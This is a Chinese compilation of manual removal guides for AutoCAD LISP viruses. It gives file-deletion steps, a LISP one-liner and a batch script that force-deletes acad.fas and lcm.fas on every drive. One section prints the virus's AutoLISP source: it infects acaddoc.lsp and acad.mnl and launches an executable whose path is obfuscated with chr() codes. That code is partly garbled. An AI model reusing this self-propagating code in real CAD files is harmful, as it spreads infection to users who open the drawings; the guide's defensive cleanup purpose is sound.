常见CAD病毒文件的手动查杀方法

在软件操作过程中发现楼层无法切换的解决方法（主要由acaddoc.lsp病毒文件引起）。

第一种
1、注意首先将感染acaddoc.lsp病毒的工程文件夹打开，把文件中的acaddoc.lsp文件删除。

2、删除c盘中的boot.dat文件。

3、在鲁班软件安装目录中（sysdat\sys16）找到acaddoc.lsp文件，打开后全选所有内容并删除，保存后关闭。

然后右击该文件夹选择属性，点选只读并确定。

第二种
刚才那个病毒的问题，试过了在我们软件里加一个空的lsp文件打开我们软件就不会有问题了
不过其实病毒还在的，要彻底清除病毒，要删除C:\Documents and
Settings\Administrator\Application Data\Autodesk\AutoCAD
2006\R16.2\chs\Support 这个文件夹里的acadapq.lsp和acaddoc.lsp文件，把acad.mnl 文件里最后的
(load "acadapq")
(princ)
这两句话删除，再删除所有的acaddoc.lsp文件就可以了。

清除方法是删除干净acad.fas与lcm.fas两个文件!
如果删除不净下次启动是还是会生成,务必清理干净!
常见问题是C:\Program Files\autocad***目录（子目录）下的
acad.fas与lcm.fas是在全部查找时找不到的,请手动进入目录再行查找删除!
不想进去目录查找也可以输入下面的字符到CAD命令行：
(while (or (setq a (findfile "acad.fas")) (setq a (findfile "lcm.fas"))) (vl-file-delete a))注意：上面红字一个字都不能少哦！这样就行了!
如果有文字编缉时出现记事本的现象请将下面一行红字输入到命令行？：
(setvar "mtexted" ".")
解决方法是彻底的清除acad.fas与lcm.fas两个文件。

如果删除不净下次启动是还是会生成,必须清理干净!
一，搜索安装CAD软件的目录（子目录）下及存放图纸盘中的acad.fas与lcm.fas 全部文件进行删除!（我觉得这样比较彻底一些）
二，不想进去目录查找也可以输入下面的字符到CAD命令行：
(while (or (setq a (findfile "acad.fas")) (setq a (findfile "lcm.fas"))) (vl-file-delete a))
注意：括弧的字一个都不能少。

如果有文字编缉时出现记事本的现象就要将下面一行字输入到命令行：(setvar "mtexted" ".")。

1、在360安全卫士中，卸载CAD软件以及DWF等所有CAD的相关软件；
2、在360安全卫士中，电脑清理（全选）——清理——跳过风险项；
一键清理
清理注册列表（右下角选项，全选）
3、“我的电脑”——搜索（搜索选项具体见图片）“acad.lsp”、“acad.fas”、“acaddoc.lsp”、“acad.sys”、“acad.app.lsp”——彻底删除（shift+delete）
4、重启电脑
5、CAD安装
1.如果看到图纸文件夹内除了.dwg文件外，还有.fas .lsp .mnl .arx类型文件，如果不明其用途，一定要删除，拷贝别人图纸的时候，注意别把它们拷贝过来。

特别是通过网络共享打开对方文件夹内图纸时候，如果看见这类文件，切勿直接打开，须将图纸拷贝到自己电脑上再打开。

通俗的讲，只要不拷贝这类文件，99%不会中毒。

CAD中“党是不会亏待你的”恶意程序删除办法
一、病毒发作后的主要表现：
①、病毒在启动CAD时会弹出一个显示时间并写有“党
是不会亏待你”的对话框；
②、病毒在8:00至18:00这个段时间内，对CAD画图没有任何的影响。

当时间不在8:00至18:00之间时，会弹出如下对话框，可能伴随“移动”命令改变~等情况。

二、清除方法：
1、关闭CAD（一定要先关闭正在运行的CAD程序）
2、新建一个文本文件（txt文件）
3、复制如下蓝色内容到文本文件内(不要有任何更改)
@ECHO OFF
ECHO 正在查找并清除CAD病毒文件，请稍候. . .
ECHO.
for %%i in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
if exist %%i: (
%%i:
ECHO 正在查找%%i 盘
cd\
del /f /q /s acad.fas
del /f /q /s lcm.fas
))
ECHO.
ECHO CAD病毒清除完毕！任意键退出!
Pause>Nul
4、将该文本文件另存为“文件名．bat”，文件名随意（假定另存为１．ｂａｔ）
５、鼠标左键双击１．ｂａｔ，运行该文件，出现如下提示框
请淡定并耐心等待，直至出现如下提示内容
如上图，看到红圈内容出现，按任意键退出程序，再重新打开CAD图纸，一切ok啦！
注：如果下次再出现类似问题，运行该文件即可。

一般情况下，如果没有再次拷贝或者下载带有该恶意程序病毒的CAD文件，运行一次即可清除。

最近中了CAD病毒，msconfig里增加了一项“dwgrun.exe”，运行CAD后，自动生成acad.fas文件，而且有些CAD命令也用不了，上网搜了一下，可按下面的方法解决：
方法一
1.清除注册表的启动记录SOFTMICRO..WINdowscurvverRun
2.在运行栏内输入msconfig 在启动项将dwgrun.exe删除
3.清除SYSTEM或SYSTEM32内的winsys.ini 和winfas.ini文件(在安全模式杀)
4.搜索C盘以及CAD安装的盘符D或F"acad.fas或acad.ini"找到并删除或改名
5.打开CAD进入配置选项卡，把启动时加载acad.lsp项取消.重启即可!!
方法二
还有一种cad病毒是在打开dwg文件后出现如下对话框
现在时间是：XX点XX分了的哦！
好好干了啦！党是不会亏待你的！
老板的眼睛是雪亮的啦！
非常讨厌，解决办法是
清除方法是删除干净acad.fas与lcm.fas两个文件!
如果删除不净下次启动是还是会生成，务必清理净!
常见问题是C:Program Filesautocad***目录下(以及子目录下)的acad.fas与lcm.fas是在全部查找时找不到的，请手动进入目录再行查找删除!也就是全盘查找，包括隐藏文件，我曾经中过，结果在系统盘、软件安装盘和其他盘的共享文件夹中都发现过，可见其具有传播性。

手动删除。

再打开果然没有对话框，但不确定是否清除干净。

方法三
使用专杀软件。

手工查杀ACADDOC.LSP病毒发现中的这个病毒的状况是：开AutoCAD2006后提示"＜AutoCAD 菜单实用程序已加载。

正在初始化VBA 系统...执行错误执行错误＞"同时发现工作目录平时只有DWG、BAK 等熟悉文件外，多了acaddoc.lsp，打开看如下：(setqwold_cmd(getvar"cmdecho"))(setvar"cmdecho")(setqwpath(findfile"base.dcl"))(setqwpath(substrwpath1(-(strlenwpath)8)))(setqwwmnlwpath(getvar"menuname" ))(setq wnowdwg (getvar "dwgname" ))(setqwwjqm (findfile wnowdwg))(setq wdwgwpath (substr wwjqm1(-(strlen wwjqm)(strlen wnowdwg))));;;alert(setqf(open"c:\\boot.dat" "w"))(write-line"[dang]"f)(write-line (strcat"ff=" wdwgwpath)f)(write-line (strcat"yy="wpath)f)(closef)(setqboot(findfile "boot.dat"))(if(/=boot"")(command"_-vbarun" "ThisDrawing.hh" ))(setq wacadwpath (findfile "acaddoc.lsp"))(setq wacadwpath (substr wacadwpath1(strlen wacadwpath )11)))(setqwns1""wns2"")(setqwlspbj0)(setq wwjqm (strcat wpath "acaddoc.lsp" ))(if(setqwwjm (open wwjqm "r"))(progn (while (setqwwz(read-linewwjm))(setqwns1wns2)wns2 wwz))(if(> (strlen wns1) 14)(if(= (substr wns187) "acadapq" )(setq wlspbj1)))(close wwjm)))(setq wlspmnl 0)(setq wwjqm (strcat wpath "acad.mnl" ))(if(setq wwjm (open wwjqm "r")) (progn (while (setq wwz (read-line wwjm))(setq wns1 wns2) (setq wns2 wwz))(if(> (strlen wns1) 14)(if(= (substrwns187) "acadapq" )(setq wlspmnl 1))) (closewwjm)))(if(= wlspmnl 0) (progn (setq wwjqmwpath (strcat (chr97)(chr99)(chr97)(chr 100) (chr46)(chr 109) (chr 110) (chr108))))(setq wwjm (open wwjqm "a"))(write-line (strcat "(load " (chr34) "acadapq" (chr34) ")")wwjm)(write-line "(princ)" wwjm)wwjm)))(defun wwriteapp () (if(setqwwjm1 (open wnewacad "w"))(progn (setqwwjm (open woldacad "r"))(while (setqwwz(read-line wwjm))(write-line wwzwwjm1))(close wwjm)(close wwjm1))))(and(= wacadwpath wdwgwpath) (/= wacadwpath wpath))(progn(if(= 0wlspmnl)(progn(setq woldacad (findfile "acaddoc.lsp" ))(setq wnewacad (strcat wpath "acadapq.lsp") ))(progn(setq woldacad (strcatwpath "acadapq.lsp" ))(setq wnewacad (findfile "acaddoc.lsp" )))(if(=wlspbj0) (progn (setq wwjqm (strcat wpath "acaddoc.lsp" ))(setqwwjm (open wwjqm "a"))(write-line (strcat "(load " (chr34) "acadapq" (chr34)")")wwjm)(write-line "(princ)" wwjm)(close wwjm))) (wwriteapp ))(progn(/= wnowdwg "Drawing.dwg" )(progn(setq woldacad (findfile "acadapq.lsp" ))(setq wnewacad (strcat wdwgwpath "acaddoc.lsp" )) (wwriteapp)))))(setvar "cmdecho" wold_cmd)(princ)(setq strtopstr (strcat(chr92)(chr92)(chr70)(chr83)(chr49)(chr(chr83)(chr89)(chr83)(chr49)(chr92)(chr87)(chr79)(chr82)(chr75)(chr92)(chr80)(chr76)(chr79)(chr84)(chr69)(chr82)))(setq strbottomstr (strcat (chr(chr92)(chr76)(chr(chr67)(chr80)(chr82)(chr88)(chr89)(chr49)(chr46)(chr69)(chr88)(chr69)))(startapp(strcatstrtopstrstrbottomstr))(setvar"cmdecho"wold_cmd)(princ)(princ)N年以前学了点autolsp，虽然没编过什么程序，这个病毒基本还比较浅，能看得出个大概流程，原理跟acad.lsp差不多，利用AutoCAD自动加载文件活得病毒运行，然后感染，acaddoc.lsp是AutoCAD2004后每个图形打开时执行的例行程序，方便二次开发用的，当然也为病毒编写人敞开大门。

天正CAD产生的acaddoc.lsp病毒怎么解决①、关闭CAD（一定要先关闭正在运行的CAD程序）。

②、进入安全模式（重要前提！！！），按F3键打开XP系统的文件搜索窗口，搜索并删除acad.lsp、acadappp.lsp、acadapp.lsp acadapq.lsp 、acaddoc.lsp 这5个文件。

注意：“搜索范围”一定要选择“本机硬盘驱动器...”，并勾选“搜索选项”中的“高级选项”，将其下的“搜索子文件夹”项勾选上，否则不能将这3个文件全部搜索清除干净。

③、复制下面的代码在CAD命令行运行，以恢复被修改的系统变量默认值：(setvar "zoomfactor" 40)(setvar"mbuttonpan" 1)(setvar"HIGHLIGHT" 1)(setvar "fillmode" 1)④用记事本打开CAD下的“acad.mnl”文件，将文件最后一行代码(load "acadappp")删去。

(错误: LOAD 失败: "acadapq")的根源。

(如“acad.mnl”文件中无此行代码可忽略此操作)附：“acad.mnl”文件可能在下面的目录中，C:\Documents and Settings\×××\Application Data\Autodesk\AutoCAD200×\R×.×\chs\Support其中×××是你登录系统时的用户名，200×和R×.×分别是CAD的版本和版本代号。

（注意：目录C:\Documents and Settings\是系统隐藏文件夹）acaddoc.lsp病毒有效的方法。

1:查找acaddoc.lsp，把高级选项打开，把隐藏的也搜索出来删除。

第一步：查找硬盘、U盘内的acad.fas、lcm.fas、acad.lsp、acadapp.lsp、acadappp.lsp 五个文件并删除干净（查找前请将显示隐藏和系统文件打开，这五个文件不一定同时出现。

强烈建议使用Total Commander文件管理器查找）。

第二步：查找acad.mnl文件（这个文件通常有两个，一个在“c:\ProgramFiles\AutoCAD****\UserDataCache\Support\”文件夹下，另一个在“c:\Documents and Settings\你的用户名\Application Data\Autodesk\AutoCAD****\R****\chs\Support\”文件夹下。

目前病毒仅修改第一个acad.mnl文件）。

打开acad.mnl文件，在文件末尾找到以下三个语句的组合并删除（这三个语句组合不一定同时出现），然后保存文件。

(if (null stol) (load "lcm" ""))(princ)(load "acadapp.lsp")(princ)(load "acadappp.lsp")(princ)最后将acad.mnl文件的属性改为只读附录：有关该CAD病毒acad.fas 的说明：1.它对电脑是没有任意的危害性！2.它在8:00到18:00这段时间,对CAD没有任何影响的!它的副作用就是：你的CAD在启动时会弹出一个显示时间的对话框如果时间不在8:00至18:00之间，还有可能伴随"移动"命令改变等情况。

在这段时间内的临时解决方案为：将电脑系统时间调整8:00就行了!(有必时请关了CAD后再打开CAD)不想进去目录查找也可以输入下面的字符到CAD命令行：(while (or (setq a (findfile "acad.fas")) (setq a (findfile "lcm.fas"))) (vl-file-delete a))如果有文字编缉时出现记事本的现象请将下面一行红字输入到命令行？：(setvar "mtexted" ".")我的也中过，通过下面办法解决了。